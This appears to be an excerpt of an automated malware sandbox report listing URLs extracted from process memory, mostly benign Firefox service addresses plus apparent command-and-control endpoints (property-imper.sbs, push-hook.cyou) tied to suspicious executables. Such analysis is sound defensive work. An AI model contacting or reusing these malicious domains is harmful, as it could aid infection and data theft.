Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: unmYCIPOHmXNjqOesrEy.dll.12.dr String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: firefox.exe, 00000020.00000003.2853671144.000001D549C77000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2851446106.000001D549A00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2853467336.000001D549C5A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2853199617.000001D549C3C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2852871617.000001D549C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 00000023.00000002.2934533740.00000279078CF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 00000020.00000003.2855347222.000001D547C33000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000020.00000003.2855347222.000001D547C33000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 00000020.00000003.2855347222.000001D547C33000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000023.00000002.2934533740.0000027907886000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 00000020.00000003.2855347222.000001D547C33000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 00000020.00000003.2855347222.000001D547C33000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com
Source: e5e907fecb.exe, 0000000F.00000003.2989720375.0000000000EEC000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.3004682669.0000000000EEC000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.3060784533.0000000000EEC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/
Source: e5e907fecb.exe, 0000000F.00000003.2989720375.0000000000EEC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/N
Source: e5e907fecb.exe, 0000000F.00000003.3061181607.0000000000E7A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/api
Source: e5e907fecb.exe, 0000000F.00000003.2982257579.0000000000E7A000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.3061181607.0000000000E7A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/api1R
Source: e5e907fecb.exe, 0000000F.00000003.3205264572.0000000000E7A000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.3061181607.0000000000E7A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/api8R
Source: e5e907fecb.exe, 0000000D.00000002.2681648947.0000000001197000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apia
Source: e5e907fecb.exe, 0000000F.00000003.3204335566.0000000000ED3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apim
Source: e5e907fecb.exe, 0000000F.00000003.3204110998.00000000056C9000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.3002989012.00000000056D0000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2946221851.00000000056CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apited
Source: e5e907fecb.exe, 0000000F.00000003.2982257579.0000000000ED3000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2951041337.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2950450071.0000000000ED3000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.3061181607.0000000000ED3000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2826165474.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/api~
Source: e5e907fecb.exe, 0000000F.00000003.2982166481.0000000000EE9000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2989720375.0000000000EEC000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.3004682669.0000000000EEC000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.3060784533.0000000000EEC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/f
Source: e5e907fecb.exe, 0000000D.00000002.2681648947.00000000011F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/psPATHEXT=.COM;.EXE;.BA7
Source: e5e907fecb.exe, 0000000D.00000003.2680706736.00000000011F2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/psPATHEXT=.COM;.EXE;.BAM
Source: e5e907fecb.exe, 0000000F.00000003.3205264572.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2982257579.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000002.3277415310.0000000000E6E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/x
Source: e5e907fecb.exe, 0000000F.00000003.2989720375.0000000000EEC000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.3004682669.0000000000EEC000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.3060784533.0000000000EEC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/~
Source: e5e907fecb.exe, 0000000F.00000003.3061181607.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2950450071.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.3205264572.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2982257579.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs:443/api
Source: e5e907fecb.exe, 0000000F.00000003.3061181607.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2950450071.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.3205264572.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000002.3277415310.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2982257579.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs:443/apit
Source: e5e907fecb.exe, 0000000F.00000003.3061181607.0000000000E58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs:443/apitPK
Source: r5mqFEC.exe, r5mqFEC.exe, 0000000A.00000003.2654265532.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000002.2666574933.0000000003255000.00000004.00000020.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000003.2662244591.0000000003255000.00000004.00000020.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000003.2558891081.00000000032B0000.00000004.00000020.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000003.2525316848.00000000032B2000.00000004.00000020.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000003.2663034067.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000002.2666691867.00000000032A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://push-hook.cyou/
Source: r5mqFEC.exe, 0000000A.00000003.2654265532.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000003.2663034067.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000002.2666691867.00000000032A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://push-hook.cyou/?
Source: r5mqFEC.exe, 0000000A.00000003.2525316848.00000000032B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://push-hook.cyou/F
Source: r5mqFEC.exe, 0000000A.00000003.2602427215.00000000032AA000.00000004.00000020.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000003.2663034067.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000002.2666691867.00000000032A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://push-hook.cyou/api
Source: r5mqFEC.exe, 0000000A.00000003.2525316848.00000000032B2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://push-hook.cyou/apif
Source: r5mqFEC.exe, 0000000A.00000002.2666574933.0000000003255000.00000004.00000020.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000003.2662244591.0000000003255000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://push-hook.cyou/apis.
Source: r5mqFEC.exe, 0000000A.00000002.2666574933.0000000003255000.00000004.00000020.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000003.2662244591.0000000003255000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://push-hook.cyou/c
Source: r5mqFEC.exe, 0000000A.00000003.2654265532.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000003.2558891081.00000000032B0000.00000004.00000020.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000003.2663034067.00000000032A3000.00000004.00000020.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000002.2666691867.00000000032A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://push-hook.cyou/w
Source: r5mqFEC.exe, 0000000A.00000003.2558891081.00000000032B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://push-hook.cyou/y
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 00000020.00000003.2852871617.000001D549C1F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: r5mqFEC.exe, 0000000A.00000003.2462569641.0000000005AC5000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2828381892.0000000005765000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.microsof
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/social-media-tracking-report
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-report
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: e5e907fecb.exe, 0000000F.00000003.2916826628.00000000057E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: e5e907fecb.exe, 0000000F.00000003.2916826628.00000000057E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: r5mqFEC.exe, 0000000A.00000003.2462834549.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000003.2497922525.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000003.2462569641.0000000005AC3000.00000004.00000800.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000003.2462681900.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2858691252.0000000005717000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2859630933.0000000005717000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2829136213.0000000005717000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2828381892.0000000005763000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: r5mqFEC.exe, 0000000A.00000003.2462681900.0000000005A52000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2829136213.00000000056F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: r5mqFEC.exe, 0000000A.00000003.2462834549.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000003.2497922525.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000003.2462569641.0000000005AC3000.00000004.00000800.00020000.00000000.sdmp, r5mqFEC.exe, 0000000A.00000003.2462681900.0000000005A77000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2858691252.0000000005717000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2859630933.0000000005717000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2829136213.0000000005717000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2828381892.0000000005763000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: r5mqFEC.exe, 0000000A.00000003.2462681900.0000000005A52000.00000004.00000800.00020000.00000000.sdmp, e5e907fecb.exe, 0000000F.00000003.2829136213.00000000056F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: firefox.exe, 00000022.00000002.2934934845.000002651AE50000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.2937283139.0000027907E60000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://token.services.mozilla.com/1.0/sync/1.5
